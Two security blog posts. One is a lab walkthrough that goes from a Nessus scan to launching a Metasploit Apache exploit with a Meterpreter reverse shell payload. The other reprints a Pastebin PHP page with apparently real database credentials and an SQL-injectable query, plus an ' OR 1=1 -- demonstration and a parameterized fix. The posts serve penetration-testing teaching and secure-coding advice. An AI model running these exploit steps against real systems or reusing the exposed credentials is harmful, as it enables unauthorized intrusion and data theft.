From Nessus to Metasploit to game over

How many times have you fired off a Nessus scan and then, after finding the goodies, had to go to ExploitDB or a similar site in search of an exploit? Or, if you are a pro, it's off to write your own exploit for the newly discovered vulnerability.

Today's post will focus on what to do after you have scanned that vulnerable system and found a juicy vulnerability. If this is the first time you have heard of ExploitDB or Metasploit, you should first visit the Metasploit Unleashed training site.

Lab setup

  • Backtrack 4 Linux VM
  • Windows 2003 server with a vulnerable web app

Below are the necessary steps to get from a Nessus scan to the correct Metasploit module for exploiting your system.

Step one: Install Nessus

You can download your copy of Nessus from HERE, and don't forget to register for a HomeFeed license. Now create your scan policy or use one of the default policies. I selected the web application policy since the target server was running an outdated web application. Once your scan is completed, download the report and save it in .nessus format.

Step two: Launching Metasploit

Log in to your machine of choice; in my case it's my BackTrack 4 Linux VM. Issue the following commands to load Metasploit:

  • cd /pentest/exploits/framework3 (change directory to your metasploit installation dir)
  • ./msfconsole
  • svn up (to get the latest update)

Step three: DB Magic

At this stage you will need to create a DB, import the scanned Nessus report, and then perform your hacking kung fu with the db_autopwn command.

msf > db_create

msf > db_connect
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don't count on it
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

db_import /pentest/results/nessus_report_TestSrvr.nessus
msf > db_import /pentest/results/nessus_report_Appsrvr.nessus
[*] Importing 'Nessus XML (v2)' data
[*] Importing host 10.10.0.19
[*] Successfully imported /pentest/results/nessus_report_TestSrvr.nessus

db_autopwn -t -x

This command searches Metasploit for any exploits that match the vulnerabilities in your Nessus report; it will not automatically run the exploits for you unless you use the -e option. In most cases, if you are testing this against a live system, you should leave out the -e option to avoid crashing your server.

msf > db_autopwn -t -x
[*] Analysis completed in 10 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   10.10.0.19:445  exploit/windows/smb/psexec  (CVE-1999-0504, OSVDB-3106)
[*]   10.10.0.19:80  exploit/windows/http/apache_mod_rewrite_ldap  (CVE-2006-3747, BID-19204, OSVDB-27588)
[*] ================================================================================
[*]
[*]

From this point I have two exploits to choose from:

msf > use exploit/windows/http/apache_mod_rewrite_ldap
msf exploit(apache_mod_rewrite_ldap) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apache_mod_rewrite_ldap) > set LHOST 10.10.0.17
LHOST => 10.10.0.17
msf exploit(apache_mod_rewrite_ldap) > set RHOST 10.100.0.9
RHOST => 10.100.0.9
msf exploit(apache_mod_rewrite_ldap) > exploit

From this point on it's GAME OVER!
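To make the db_autopwn -t -x matching step concrete, here is an added Python example (not Metasploit's or Nessus's own code) that reads a .nessus v2 report, collects each finding's CVE/BID/OSVDB references, and lists which findings share a reference with a known module, which is also a quick way to rank what to patch first. The XML is a constructed sample using the host from the post and placeholder plugin IDs; the module table reuses only the references db_autopwn printed above.

```python
import xml.etree.ElementTree as ET

# Constructed .nessus v2 fragment: the host and ports are the ones from the
# post, the plugin IDs and names are placeholders.
SAMPLE_NESSUS = """<NessusClientData_v2><Report name="TestSrvr">
<ReportHost name="10.10.0.19">
 <ReportItem port="445" protocol="tcp" svc_name="cifs" pluginID="900001"
             pluginName="placeholder SMB finding" severity="3">
  <cve>CVE-1999-0504</cve><xref>OSVDB:3106</xref></ReportItem>
 <ReportItem port="80" protocol="tcp" svc_name="www" pluginID="900002"
             pluginName="placeholder Apache finding" severity="3">
  <cve>CVE-2006-3747</cve><bid>19204</bid><xref>OSVDB:27588</xref></ReportItem>
 <ReportItem port="80" protocol="tcp" svc_name="www" pluginID="900003"
             pluginName="banner grab, no references" severity="0"/>
</ReportHost></Report></NessusClientData_v2>"""

# Module -> references, exactly as db_autopwn -t -x printed them in the post.
MODULE_REFS = {
    "exploit/windows/smb/psexec": {"CVE-1999-0504", "OSVDB-3106"},
    "exploit/windows/http/apache_mod_rewrite_ldap":
        {"CVE-2006-3747", "BID-19204", "OSVDB-27588"},
}


def parse_nessus(xml_text):
    """One dict per ReportItem, references normalised to db_autopwn's form."""
    findings = []
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        for item in host.iter("ReportItem"):
            refs = {c.text.strip() for c in item.findall("cve")}
            refs |= {"BID-" + b.text.strip() for b in item.findall("bid")}
            # xref entries look like "OSVDB:3106"; the module table uses "OSVDB-3106"
            refs |= {x.text.strip().replace(":", "-", 1) for x in item.findall("xref")}
            findings.append({"host": host.get("name"), "port": int(item.get("port")),
                             "proto": item.get("protocol"),
                             "plugin": item.get("pluginName"), "refs": refs})
    return findings


def match_modules(findings, module_refs=MODULE_REFS):
    """Pair each finding with every module that shares a reference (the -x
    matching). Nothing is launched; that is what the -e flag would add."""
    matches = set()
    for finding in findings:
        for module, refs in module_refs.items():
            if finding["refs"] & refs:
                matches.add((finding["host"], finding["port"], module))
    return sorted(matches)
```

The informational item with no references never matches, which is why a clean db_autopwn run can still leave plenty of Nessus findings unaddressed.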

References:
http://www.metasploit.com/modules/exploit/windows/smb/psexec
http://www.metasploit.com/modules/exploit/windows/http/apache_mod_rewrite_ldap
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.tenable.com/products/nessus/documentation


Being smart about testing your application

This is just going to be a short writeup on something I figured was worth mentioning. While going through Pastebin I found the following entry 3 seconds after it was posted --> http://pastebin.com :

<?php

include 'top.php';
include 'submenuhonorshall.php';

/*SELECT * FROM TABLE WHERE field =

*/

$db = 'gnemi_addison';

mysql_connect("gnemi.php-corner.com", "gnemi_root", "ignurupi87") or die(mysql_error());
mysql_select_db($db) or die(mysql_error());

?>

<div id="content">
<h1>Honors Hall Library</h1>
<form method="post">
<p class="norm">
<select name="searchby">
<option value="Author_First_Name">Author First Name</option>
<option value="Author_Last_Name" selected="selected">Author Last Name</option>
<option value="Title">Title</option>
</select>
<input type="text" name="query" />
<input type="submit" value="Submit!" />
</p>
</form>

<?php

$result = mysql_query("SELECT * FROM `library` WHERE `'" . $_POST['searchby'] . "'` = '" . $_POST['query'] . "' ORDER BY `Title` LIMIT 20");

while ($row = mysql_fetch_array($result))
{
echo $row['Last Name'] . $row['First Name'] . $row['Title'] .$row['inout'];
}

?>

<?php

include '../address.php';
include '../phptemplates/bottomhall.php';

?>

Now to the average person that's not a big deal, but to me, after looking at that bit of PHP code, the following questions came to mind:

  • Would I find anything useful if I were to Google the various pages referenced in that code, or maybe the domain "gnemi.php-corner.com"?
  • What would I find if I ran a whois lookup against that domain?
  • What if I Googled the email addresses associated with that domain?
  • And most importantly, are the username and password referenced still being used?
  • Are those table and DB names real or just test names?
  • Would I find anything interesting if I were to crawl that website?

Now a simple whois returned a valid email address along with some other useful information:

And just out of curiosity after visiting http://gnemi.php-corner.com/godWindow/ I was presented with the following:

Now I ***DID NOT LOGIN*** I repeat ***DID NOT LOGIN***, so I don't know if those credentials are valid, BUT what if they were? I am hoping for this person's sake that all of the above information is just for testing purposes, but what if it's not? Sanitizing all valid information before posting it would have been nice.
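Beyond the leaked credentials, the query in that snippet pastes both form fields straight into the SQL text. As an added example (not the pasted code or its author's), here is the same search in Python over sqlite3 as a stand-in for MySQL: the vulnerable pattern next to a hardened version that checks the column name against the three options the form offers (an identifier cannot be bound as a parameter) and binds the search value as a parameter. The table rows are constructed.

```python
import sqlite3

# Columns the form offers. A column name is an SQL identifier, so it cannot be
# bound as a parameter; it has to be checked against a fixed list instead.
SEARCH_COLUMNS = ("Author_First_Name", "Author_Last_Name", "Title")


def make_sample_db():
    """In-memory stand-in for the `library` table, filled with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE library (Author_First_Name TEXT, "
                 "Author_Last_Name TEXT, Title TEXT, inout TEXT)")
    conn.executemany("INSERT INTO library VALUES (?, ?, ?, ?)", [
        ("Frank", "Herbert", "Dune", "in"),
        ("Ursula", "Le Guin", "The Dispossessed", "out"),
        ("Mary", "Shelley", "Frankenstein", "in"),
    ])
    return conn


def vulnerable_search(conn, searchby, query):
    """The leaked query's pattern (stray quotes dropped): both inputs are
    concatenated into the SQL text, so either can rewrite the statement."""
    sql = ("SELECT * FROM `library` WHERE `" + searchby + "` = '" + query
           + "' ORDER BY `Title` LIMIT 20")
    return conn.execute(sql).fetchall()


def library_search(conn, searchby, query):
    """Hardened form: identifier from an allow-list, value bound as a parameter."""
    if searchby not in SEARCH_COLUMNS:
        raise ValueError("unsupported search column: %r" % searchby)
    sql = ("SELECT * FROM `library` WHERE `" + searchby + "` = ? "
           "ORDER BY `Title` LIMIT 20")
    return conn.execute(sql, (query,)).fetchall()


if __name__ == "__main__":
    db = make_sample_db()
    print(library_search(db, "Title", "Dune"))                 # the one matching row
    print(len(vulnerable_search(db, "Title", "' OR 1=1 --")))  # every row leaks
    print(library_search(db, "Title", "' OR 1=1 --"))          # [] : just a title
```

The database credentials in the snippet are the other half of the problem; they belong in a config file outside the web root or in the environment, not in page source that may end up pasted anywhere.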